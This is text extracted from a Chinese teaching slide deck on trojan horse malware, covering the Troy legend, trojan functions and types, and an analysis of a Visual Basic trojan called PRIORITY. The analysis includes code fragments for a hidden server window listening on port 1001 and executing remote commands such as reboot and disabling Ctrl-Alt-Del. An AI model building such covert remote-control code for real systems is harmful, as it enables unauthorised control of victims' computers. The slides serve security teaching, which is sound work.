【文档说明】计算机病毒与防护木马病毒基础课件.ppt，共(18)页，970.500 KB，由小橙橙上传

转载请保留链接：https://www.ichengzhen.cn/view-5073.html

以下为本文档部分文字说明：

Virus计算机病毒与防治教学单元3-5木马病毒防治木马病毒的功能木马的定义和起源木马病毒的特点第一讲木马病毒基础计算机病毒与防治课程小组木马病毒的分类木马病毒的工作原理木马病毒的由来哪位同学能给我们讲一讲关于木马的传说……一

段古希腊故事越形象越生动越好哦！计算机病毒与防治课程小组木马病毒的起源你应该听过“木马屠城记”的故事吧？然而，这场持续了九年的大战，为何最终竟终结在一只木马上呢？话说风流倜傥的特洛伊王子巴里德，遇上希腊皇后海伦后，竞一发不可收拾地将其诱拐带回国。此举也激起了一场死伤无数的滔天大战……。特

洛伊木马城遗址木马病毒的起源原来，希腊人见特洛伊城久攻不下，便特制了一匹巨大的木马，打算来个“木马屠城计”。希腊人在木马中安排了一批视死如归的勇士，待两军激战正酣时，借故战败撤退，诱敌上钩。果然，被敌军撤退喜讯弄得神志不清的特洛伊人哪知中计，当晚使把木马拉进城中，

打算来个欢天喜地的庆功宴。谁知，就在大家兴高采烈喝酒欢庆之际，木马中的精锐悍将早己暗中打开城门，来个里应外合的大抢攻开始了！顿时，一个美丽的城市变成了一堆瓦砾、焦土，毁灭于历史中……。计算机病毒与防治课程

小组传说中的特洛伊木马木马屠城的故事……什么是木马病毒呢？我们所要谈的当然不仅仅是这个希腊故事，但我们要谈的木马(也称“特洛伊木马”)，原理跟这个故事差不多。所谓的木马程序其实就是一种远程控制程序，只是后来其功能被修改得越来越强大而已。严格来说它不能算是一种病毒

，基本上只要不运行到它就不会有事。一般的用法都是，它会有一个client端程序(己方计算机)、一个sever端程序(对方计算机)给对方运行，只要同时在线就能通过client端的程序来控制对方的计算机。计算机病毒与防治课程小组

木马的功能远程监控记录密码窃取主机的信息资料设置系统功能远程文件操作发送信息可以控制对方的鼠标、键盘和监视对方屏幕。更改主机名称，设置系统路径和得知系统版本等。可以远程关机或重新升机，设置鼠标或是把鼠标隐藏起来，终止系统程序，或是耗用大量主机资源致使系统死机

。入侵者可以远程控制对方的文件。计算机病毒与防治课程小组木马病毒的特点特性一般病毒蠕虫木马传染性强强弱感染对象文件进程进程主要传播方式文件、网络网络网络破坏性强强弱隐蔽性强强强顽固性较强较强极强欺骗性一般一般强主要攻击目的破坏数据、信息破坏数据、信息窃取数据、信息计算机病毒与防治课程小组木马病毒

的分类远程访问型木马是现在最广泛的特洛伊木马。这种木马起着远程控制的功能，用起来非常简单，只需先运行服务端程序，同时获得远程主机的IP地址，控制者就能任意访问被控制端的计算机。这种木马可以使远程控制者在

本地机器上做任意的事情，比如键盘记录、上传和下载功能、发送一个“截取屏幕”等等。这种类型的木马有著名的BO(Backoffice)和国产的冰河等。计算机病毒与防治课程小组1.远程访问型木马木马病毒的分类

密码发送型木马的目的是找到所有的隐藏密码，并且在受害者不知道的情况下把它们发送到指定的信箱。大多数这类木马程序不会在每次Windows重启时都自动加载它们大多数使用25号端口发送电子邮件。计算机病毒与防治课程小组2.密码发送型木马木马病毒的分类键盘记录型木马是

非常简单的，它们只做一种事情，就是记录受害者的键盘敲击，并且在LOG文件里做完整的记录。这种木马程序随着Windows的启动而启动，知道受害者在线并且记录每一个用户事件，然后通过邮件或其他方式发送给控制者。计算机病毒与防治课程小组3.键盘记录型木马木马病毒的分类大部

分木马程序只窃取信息，不做破坏性的事件，但毁坏型木马却以毁坏并且删除文件为己任。它们可以自动地删除受控制者计算机上所有的dl1或exe文件，甚至远程格式化受害者硬盘。毁坏型木马的危害很大，一旦计算机被感

染而没有即时删除，系统中的信息会在顷刻间“灰飞烟灭”。计算机病毒与防治课程小组4.毁坏型木马木马病毒的基本工作原理PRIORITY是一个VB编写的“木马”，该“木马”包括服务器端的SERVER.EXE及客户端的PRIORITYEXE两个程序。服务器端SERVER.EXE建立了一个SERVER窗体

，设定为隐藏窗体，并在任务栏及任务管理器中隐藏，窗体中定义了一个名为TCP2的WINSOCK控件，使用该控件打开1001端口并监听：PrivateSubFormLoad()TCP2.LocalPort=1001TCP2.1istenEndSub服务器端

监听端口1001计算机病毒与防治课程小组Priority木马结构分析木马病毒的基本工作原理当黑客用客户端PRIORITY.EXE发出远程连接请求时，隐藏在被害用户电脑中的SERVER.EXE接受连接请求：PrivateSubTCP2_ConnectionRequest(ByValreq

uesteldAsLong)TCP2.AcceptrequestedEndSub计算机病毒与防治课程小组Priority木马结构分析木马病毒的基本工作原理SERVER.EXE执行客户端发出的命令：PrivateSubTCP2_Data

Arrival(ByValbytesTotalAsLong)DimstrDataAsStringTCP2.GetDatastrDataIfstrData=“ExecuteReboot"Then重新启动Exit

WindowsEWX_LogOff,&HFFFFFFFFElselfstrOata="ExecuteDisableCtrlAltDel"ThenCallDisableCtrlAltDelete(True)使Ctrl-Alt-Del无效Elself其它功能…EndIfEndSubPr

iority木马结构分析计算机病毒与防治课程小组木马病毒的基本工作原理客户端PRORITYEXE建立了一个frmMain窗体，在窗体中定义了一个名为TCPl的WINSOCK控件、一个cmdConnect按钮、一个IP文本框及完成各种命令的菜单。当黑客欲“窥视”被

害者电脑时，与服务器建立连接：PrivateSubcmdConnectes_Click()Server=IP.TextTCP1.RemoteHost=ServerTCP1.RemotePort=1001TCP1.ConnectEndSub若黑客想远程控

制被害者电脑重启动机器，则发送命令：PrivateSubmnureboot_ClickQTCP1.SendData"ExecuteReboot"EndSubPriority木马结构分析本讲小结什么是木马病毒木马病毒的功能和特点木马病毒的分类Priority木马结构分析

掌握木马病毒基础知识Virus